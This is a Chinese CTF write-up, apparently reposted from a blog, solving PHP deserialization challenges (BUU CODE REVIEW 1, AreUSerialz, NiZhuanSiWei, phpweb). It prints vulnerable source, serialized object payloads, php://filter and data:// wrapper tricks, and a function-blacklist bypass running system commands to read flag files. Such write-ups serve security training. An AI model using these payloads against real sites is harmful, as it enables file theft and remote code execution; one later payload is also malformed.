CTF-反序列化

目录

1、BUU CODE REVIEW 1

2、[网鼎杯 2020 青龙组]AreUSerialz

3、[ZJCTF 2019]NiZhuanSiWei

4、[网鼎杯 2020 朱雀组]phpweb


1、BUU CODE REVIEW 1

highlight_file(__FILE__);

class BUU {
   public $correct = "";
   public $input = "";

   public function __destruct() {
       try {
           $this->correct = base64_encode(uniqid());
           if($this->correct === $this->input) {
               echo file_get_contents("/flag");
           }
       } catch (Exception $e) {
       }
   }
}

if($_GET['pleaseget'] === '1') {
    if($_POST['pleasepost'] === '2') {
        if(md5($_POST['md51']) == md5($_POST['md52']) && $_POST['md51'] != $_POST['md52']) {
            unserialize($_POST['obj']);
        }
    }
}

md5值绕过可以用数组:md51[]=1&md52[]=2,也可以用md51=QNKCDZO&md52=s878926199a

绕过 __destruct()里面两个值相等,把一个值的地址赋值给另一个,不管后面怎么变,他们就会一直相等:

$a=new BUU();
$a->correct=&$a->input;
echo serialize($a);

2、[网鼎杯 2020 青龙组]AreUSerialz

<?php

include("flag.php");

highlight_file(__FILE__);

class FileHandler {

    protected $op;
    protected $filename;
    protected $content;

    function __construct() {
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }

    public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

//把content写入filemane文件里面
    private function write() {
        if(isset($this->filename) && isset($this->content)) {
            if(strlen((string)$this->content) > 100) {
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }

//把filename里面的内容强回显

    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

    private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }

    function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }

}

//判断输入的是不是可打印字符

function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}



if(isset($_GET{'str'})) {

    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }

}

 __destruct()会自动执行,判断如果op==="2",把op="1"。我们要执行read()就要让op=2,2!==“2”,2==“2”。然后再把filename的值换为flag.php就行了。

class FileHandler {
        public $op = 2;
        public $filename = "flag.php";
        public $content;
    }
    $a = new FileHandler();
        $b = serialize($a);
        echo($b);
str=O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:8:"flag.php";s:7:"content";N;}

3、[ZJCTF 2019]NiZhuanSiWei

 <?php  
$text = $_GET["text"];
$file = $_GET["file"];
$password = $_GET["password"];
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        echo "Not now!";
        exit(); 
    }else{
        include($file);  //useless.php
        $password = unserialize($password);
        echo $password;
    }
}
else{
    highlight_file(__FILE__);
}
?> 

用data伪协议绕过文件读取:file_get_contents($text,'r')==="welcome to the zjctf")

text=data://text/plain,welcome to the zjctf

然后用php://filter伪协议 让useless.php的内容显示出来:

file=php://filter/read=convert.base64-encode/resource=useless.php 

 源码如下:

<?php  

class Flag{  //flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
?>  

__toString  当一个对象被当作一个字符串被调用,构造file="flag.php"就行了:

text=data://text/plain,welcome to the zjctf&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

源码中有这样代码:

$password = unserialize($password);
echo $password; 

 password经过反序列化后是一个对象,用echo打印出来就是把它当做字符串,所以执行__toString()。

4、[网鼎杯 2020 朱雀组]phpweb

提交了两个值,一个是func 值是date  另一个是p 值是 Y-m-d h:i:s

提交:func=file_get_contents&p=index.php查看源码:

<?php
    $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk",  "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
    function gettime($func, $p) {
        $result = call_user_func($func, $p);//调调用传递函数,并返回函数运行的结果(本例中即为执行$func($p))
        $a= gettype($result);
        if ($a == "string") {
            return $result;
        } else {return "";}
    }
    class Test {
        var $p = "Y-m-d h:i:s a";
        var $func = "date";
        function __destruct() {
            if ($this->func != "") {
                echo gettime($this->func, $this->p);
            }
        }
    }
    $func = $_REQUEST["func"];
    $p = $_REQUEST["p"];
 
    if ($func != null) {//非空
        $func = strtolower($func);//转小写
        if (!in_array($func,$disable_fun)) {//判断是否存在黑名单
            echo gettime($func, $p);//如果不存在则调用gettime,把funchep传入
        }else {
            die("Hacker...");//报错
        }
    }
    ?>

1.黑名单绕过

黑名单绕过:func=\system&p=ls

查找flag :func=\system&p=find / -name flag*

打印flag:func=\system&p=cat /tmp/flagoefiu4r93

 2、反序列化

 class Test {
        var $p = "Y-m-d h:i:s a";
        var $func = "date";
        function __destruct() {
            if ($this->func != "") {
                echo gettime($this->func, $this->p);
            }
        }
    }

构造

class Test {
    var $p = "ls";
    var $func = "system";
    function __destruct() {
        if ($this->func != "") {
            echo 1;
        }
    }
}
$a=new Test();
$b=serialize($a);
echo $b;

func=unserialize&p=O:4:"Test":2:{s:1:"p";s:2:"ls";s:4:"func";s:6:"system";}

成功执行:

然后改变func和p继续查找flag就行了: 

func=unserialize&p=O:4:"Test":2{s:1:"p";s:22:"cat/tmp/flagoefiu4r93";s:4:"func";s:6:"system";}

5、[安洵杯 2019]easy_serialize_php 

phpinfo()里面发现flag文件d0g3_f1ag.php“”

 暂时看不懂文章来源地址https://uudwc.com/A/d4X9

原文地址:https://blog.csdn.net/qq_61774705/article/details/126330449

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请联系站长进行投诉反馈,一经查实,立即删除!

上一篇 2023年06月15日 17:19
2022第十五届全国大学生信息安全竞赛(ciscn)西南赛区部分WP
下一篇 2023年06月15日 17:19